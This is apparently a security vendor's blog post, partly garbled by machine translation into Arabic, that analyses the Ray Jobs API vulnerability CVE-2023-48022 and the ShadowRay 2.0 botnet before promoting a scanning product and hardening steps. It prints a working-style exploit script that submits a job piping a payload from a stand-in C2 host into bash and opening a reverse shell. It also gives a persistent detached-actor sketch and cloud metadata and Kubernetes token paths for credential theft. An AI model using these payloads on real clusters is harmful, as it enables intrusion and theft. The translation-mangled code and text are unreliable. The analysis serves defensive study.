رأس القلم
كالي
ل AMD64
ماك
ل ARM64
ماك
قريباً
النوافذ
قريباً

ثغرة الزومبي: تشريح 2026 تشريح CVE-2023-48022 وعودة ظهور ShadowRay 2.0

It is 2026. The AI industry has matured from experimental chatbots to autonomous agents governing critical infrastructure. Yet, haunting the server farms and Kubernetes clusters of the world’s most advanced AI companies is a ghost from the past: CVE-2023-48022.

Originally disclosed in late 2023, this critical vulnerability (CVSS 9.8) in the Ray Framework—the distributed computing standard used by OpenAI, Uber, and Amazon—was supposed to be a solved problem. However, the late 2025 explosion of the ShadowRay 2.0 botnet proved otherwise. Tens of thousands of GPU clusters were silently conscripted into zombie networks, not just for cryptomining, but for sophisticated data exfiltration and distributed denial-of-service (DDoS) attacks.

For the elite AI security engineer, CVE-2023-48022 is not merely a bug; it is a case study in “Insecure by Design.” It represents a collision between the open-research culture of AI development and the adversarial reality of the modern internet. This article provides a forensic analysis of the vulnerability, dissects the evolved tradecraft of ShadowRay 2.0, and outlines why legacy scanning fails to protect the AI compute substrate.

A 2026 Autopsy of CVE-2023-48022 and the ShadowRay 2.0 Resurgence

The Architecture of a “Feature-as-a-Vulnerability”

To understand why CVE-2023-48022 refuses to die, one must understand the philosophy of Ray. Ray was built for speed and ease of use in trusted intranets.

الخلل

In versions prior to significant hardening (and in misconfigured modern deployments), the Ray Dashboard and the Jobs API bind to 0.0.0.0:8265 by default without any authentication mechanisms.

Anyscale, the creators of Ray, initially disputed the CVE assignment, arguing that Ray was intended to run within a strict network perimeter. This reliance on the “hard outer shell” defense model collapsed when developers began exposing Ray Dashboards to the internet for remote monitoring, or when attackers utilized Server-Side Request Forgery (SSRF) to pivot internally.

تفكيك سطح الهجوم

The vulnerability grants an attacker full control over the Ray cluster via a simple HTTP API. There is no memory corruption, no race condition, and no complex heap feng shui required.

The Attack Primitives:

  1. نقطة الدخول The Jobs API (/api/jobs/).
  2. الآلية The API allows the submission of arbitrary Python code or shell commands to be executed on the cluster’s worker nodes.
  3. The Privilege: Ray processes often run as root inside Docker containers, or with high-privileged IAM roles to access S3 buckets containing datasets.

Technical Replay: The ShadowRay Kill Chain

Let’s reconstruct the exploit logic used by the ShadowRay 2.0 actors. This goes beyond simple الضفيرة commands to show how they orchestrate persistent control.

Phase 1: Reconnaissance & Fingerprinting

Attackers scan specifically for TCP port 8265. They fingerprint the service by querying /api/version or looking for the distinctive Ray Dashboard HTML title.

Phase 2: Weaponization (Python Job Submission)

The attacker constructs a Python script that acts as a “Job Submitter.” This script interacts with the target’s API to spawn a malicious task.

بايثون

`import requests import json import sys

ثغرة الزومبي: تشريح 2026 تشريح CVE-2023-48022 وعودة ظهور ShadowRay 2.0

Target: An exposed Ray Cluster found via Shodan or SSRF

TARGET_IP = “http://target-cluster.ai:8265

def exploit_cluster(target): url = f”{target}/api/jobs/”

# The Payload: A multi-stage bash script
# 1. Persistence: Create a hidden cron job or systemd service
# 2. Evasion: Kill competing miners
# 3. Connection: Reverse Shell to C2
entrypoint_cmd = (
    "wget -qO- <http://c2.apt-group.xyz/payload.sh> | bash && "
    "export OMP_NUM_THREADS=1 && "
    "python3 -c 'import socket,os,pty;s=socket.socket();...'"
)

payload = {
    "entrypoint": entrypoint_cmd,
    "submission_id": "optimization_task_v4", # Social Engineering: Look like a legit job
    "runtime_env": {
        "working_dir": "/tmp",
        "pip": ["requests", "boto3"] # Pre-install tools for exfiltration
    },
    "metadata": {
        "user": "root",
        "description": "System Health Check"
    }
}

try:
    print(f"[*] Sending payload to {target}...")
    resp = requests.post(url, json=payload, timeout=10)
    
    if resp.status_code == 200:
        job_id = resp.json().get('job_id')
        print(f"[+] Exploitation Successful. Job ID: {job_id}")
        print(f"[+] The cluster is now under your control.")
    else:
        print(f"[-] Failed: {resp.status_code} - {resp.text}")
        
except Exception as e:
    print(f"[!] Error: {e}")

إذا name == “main“: exploit_cluster(TARGET_IP)`

Phase 3: Lateral Movement via Identity Theft

Once the code executes on the worker node, the script leverages the Instance Metadata Service (IMDS) to steal cloud credentials.

  • AWS: استعلام http://169.254.169.254/latest/meta-data/iam/security-credentials/ to steal the EC2 role’s keys.
  • Kubernetes: Read /var/run/secrets/kubernetes.io/serviceaccount/token.

Because AI training jobs require access to massive datasets, these credentials often have S3FullAccess or equivalent permissions, allowing the attacker to exfiltrate proprietary models (worth millions) or poison training data.

ShadowRay 2.0: Evolution of Persistence

The “2.0” variant observed in late 2025 introduced a novel persistence mechanism: Detached Actors.

In Ray, an “Actor” is a stateful worker process. Attackers deploy malicious Actors that are designed to detach from the job lifecycle. Even if the security team kills the specific “Job” seen in the dashboard, the Actor process remains alive in the background, consuming resources and maintaining the C2 link.

بايثون

`# Conceptual Malicious Actor @ray.remote class ShadowActor: def ابدأ(self): self.c2_connection = setup_c2()

def keep_alive(self):
    while True:
        # Mining or Exfiltration logic
        process_data()
        time.sleep(1)


Deploy as a detached actor – survives job termination

actor = ShadowActor.options(name=”system_optimizer”, lifetime=”detached”).remote()`

The “Shadow AI” Problem and Detection Failures

Why do organizations with expensive firewalls still get hit by CVE-2023-48022? The answer lies in Shadow AI.

Data Scientists and ML Engineers often bypass IT controls to spin up temporary clusters for experiments. They use Terraform scripts or Helm charts copied from GitHub, which default to exposing the Dashboard for ease of debugging. These “Shadow Clusters” are invisible to the central IT inventory and traditional vulnerability scanners (which scan 192.168.1.0/24 but miss the ephemeral VPCs created by engineers).

Furthermore, traditional scanners check for software versions. If an engineer spins up a Ray cluster using an older, stable Docker image (e.g., rayproject/ray:2.8.0) to reproduce a paper, it is instantly vulnerable.

AI-Driven Defense: The Penligent Approach

Defending against ShadowRay requires more than a static scan; it requires dynamic asset discovery و behavioral analysis.

هذا هو المكان Penligent.ai changes the defensive posture for AI infrastructure.

1. Mapping the Shadow Estate

Penligent’s agents integrate with Cloud APIs (AWS, Azure, GCP) and Kubernetes clusters to perform continuous asset discovery. It identifies compute instances that exhibit “Ray-like” behavior (open ports 8265, 10001, 6379) even if they are not tagged as production assets. This illuminates the “Shadow AI” surface.

2. Active, Safe Verification

Instead of relying on banner grabbing (which can be faked), Penligent performs Safe Active Verification. It attempts to interact with the Jobs API using a benign payload—such as submitting a job that simply calculates 1 + 1 or echoes a random string.

  • If successful: It confirms the RCE risk with zero false positives and alerts the SOC immediately.
  • Safety: Unlike a worm, Penligent’s probe does not modify the system state, install persistence, or exfiltrate data.

3. Anomaly Detection in Compute Signatures

Penligent establishes a baseline for legitimate training workloads. ShadowRay infections have a distinct fingerprint:

  • Network: Unexpected outbound connections to mining pools or unknown IPs (C2).
  • Compute: CPU/GPU utilization spikes that do not correlate with scheduled training jobs.
  • Process: Spawning of unusual shells (/bin/bash, الضفيرة, wget) from the Ray worker process tree.

Defense Strategy for 2026: Hardening the Compute Substrate

To immunize your infrastructure against CVE-2023-48022 and its successors, implement these hardcore controls:

  1. Zero Trust Networking: Never expose the Ray Dashboard to the public internet. Access should be mediated via a secure Bastion Host, VPN, or an Identity-Aware Proxy (IAP) like Cloudflare Access or AWS Verified Access.
  2. Enforce Authentication (Mutual TLS): While Ray now supports basic auth, the gold standard is mTLS. Configure Ray to require client certificates for all intra-cluster and client-server communication.
  3. Namespace Isolation: Run Ray clusters in dedicated Kubernetes namespaces with strict NetworkPolicies. Deny all egress traffic except to whitelisted S3 buckets and model registries (Hugging Face). Block access to the IMDS (169.254.169.254).
  4. Immutable Infrastructure: Use read-only root filesystems for Ray worker containers to prevent attackers from downloading tools or establishing persistence on the disk.

الخاتمة

CVE-2023-48022 is not just a vulnerability; it is a symptom of the industry’s rush to adopt AI at the expense of security architecture. As we rely more on distributed compute, the “Network Boundary” is no longer a sufficient defense.

The ShadowRay 2.0 campaign proves that attackers are actively hunting for these open doors. Security engineers must adopt an “Assume Breach” mentality, leveraging AI-driven tools like Penligent to continuously discover, test, and harden their compute assets before they become the next node in a zombie botnet.

مراجع موثوقة

شارك المنشور:
منشورات ذات صلة
arArabic